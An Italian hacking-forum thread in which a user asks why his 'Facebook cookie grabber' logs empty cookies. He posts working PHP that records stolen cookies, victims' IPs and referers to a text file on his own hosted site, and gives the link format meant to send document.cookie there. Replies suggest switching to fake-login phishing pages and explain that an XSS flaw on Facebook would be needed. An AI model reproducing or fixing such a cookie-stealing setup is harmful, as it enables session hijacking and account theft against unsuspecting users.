• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Problema risolto Facebook Cookie Grabber

bikodino

Utente Attivo
Autore del topic
11 Febbraio 2012
377
0
Miglior risposta
0
Ciao a tutti^^
Ho un problema che mi sta facendo impazzire da quasi 3 settimane. Ho letto molte guide, ed ho creato tanti di quei cookie grabber.......
Per funzionare, funzionano, solo che non mi arrivano i log, cioè mi arrivano, però vuoti. Senza l Url dell cookie catturato.O.o
Non solo su Facebook, ma pure su altri siti. Sapete dirmi dov è il problema, oppure dove è che sbaglio? Grazie.
 
Riferimento: Facebook Cookie Grabber

Sicuramente ci sarà qualche errore di programmazione nel file.

Sposto in HTML & Editor > Assistenza tecnica.
 
Riferimento: Facebook Cookie Grabber

@walter4991 ti spiego come ho fatto.
Ho incollato questo codice in un file di testo. E l ho salvato con il nome "grabber.php"
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'

');
fclose($fp);
?>


Poi ho creato un file di testo e l ho salvato "file.txt" (dove si leggeranno i cookie salvati). E ho uppato questi 2 file su un sito altervista. A questo il sito da indirizzare è questo : -http://www.tuosito.com/grabber.php?data=doocument.cookie-
Ecco. Il tutto funge! Quando apro il file di testo, si vede che è stato aperto il sito, si vede la data e l ora, ma accanto alla scritta cookie non esce niente. Non grabba il cookie.:soso: (Questo in ambiente facebook)
Posto uno sceen del risultato ottenuto:
Perfavore, Entra oppure Registrati per vedere i Link!

Dove sbaglio?
 
Ultima modifica:
Riferimento: Facebook Cookie Grabber

Con i cookie grabber non vai da nessuna parte, ti conviene darti ai Fake Login ;)
 
Riferimento: Facebook Cookie Grabber

Con i cookie grabber non vai da nessuna parte, ti conviene darti ai Fake Login ;)

Perchè? Comunque i Fake-login non fungono piu!! Facebook ti blocca la pagina in 5 minuti, e anche se cambi il nome del sito non risolvi niente!
Ps. Vorrei specificare che non sono il bimbominkia che fa lamerate!qwe Il tutto è solo a scopo informativo.
 
Riferimento: Facebook Cookie Grabber

Perchè? Comunque i Fake-login non fungono piu!! Facebook ti blocca la pagina in 5 minuti, e anche se cambi il nome del sito non risolvi niente!
Ps. Vorrei specificare che non sono il bimbominkia che fa lamerate!qwe Il tutto è solo a scopo informativo.
Perchè ormai ci sono un sacco di metodi per difendersi dai Grabber, la gente non ci casca più...
 
Riferimento: Facebook Cookie Grabber

Perchè ormai ci sono un sacco di metodi per difendersi dai Grabber, la gente non ci casca più...

E' più facile che ci casca con un cookie grabber, che con un fake-login. Dato che con il cookie grabber, basta che clicca il link.
Comunque sai spiegarmi perchè non mi funge? ;)
 
Riferimento: Facebook Cookie Grabber

Anche io ho lo stesso problema, qualcuno potrebbe risolvere?
 
Riferimento: Facebook Cookie Grabber

Anche io ho lo stesso problema, qualcuno potrebbe risolvere?

Hai il mio stesso problema? Cioè non ti grabba il cookie?

EDIT:
Non funzionerà mai, il xss manda alla pagina del grabber ma siccome il grabber prende i cookies della pagina da dove è venuto, prende i cookies dello script xss, ovvero nessuno.
E' questa la risposta vero??:soso:
 
Ultima modifica:
Riferimento: Facebook Cookie Grabber

Hai il mio stesso problema? Cioè non ti grabba il cookie?

EDIT:
Non funzionerà mai, il xss manda alla pagina del grabber ma siccome il grabber prende i cookies della pagina da dove è venuto, prende i cookies dello script xss, ovvero nessuno.
E' questa la risposta vero??:soso:
Che XSS usi?
 
Riferimento: Facebook Cookie Grabber


Per la verità nessuno! Questo lo chiedo a voi, ho aperto il tread apposta. Quella era una mia supposizione. Comunque resta il fatto, che non riesco a capire perchè questo cookie grabber non grabba niente! :cry:
 
Riferimento: Facebook Cookie Grabber

Per la verità nessuno! Questo lo chiedo a voi, ho aperto il tread apposta. Quella era una mia supposizione. Comunque resta il fatto, che non riesco a capire perchè questo cookie grabber non grabba niente! :cry:

Non grabba perchè non usi una XSS ed attualmente su facebook non ci sono XSS conosciute.
In totale è inutilizzabile :soso:
 
Riferimento: Facebook Cookie Grabber

L' html è un linguaggio in cui sono presenti pochissime( credo anche nulle ) vulnerabilità.
Già che è difficile fare quello che vuoi fare su un sito di altervista con la pagina in html, pensa su Facebook che è anche molto più difficile.
 
Riferimento: Facebook Cookie Grabber

Ok grazie a tutti per le risposte. Problema risolto.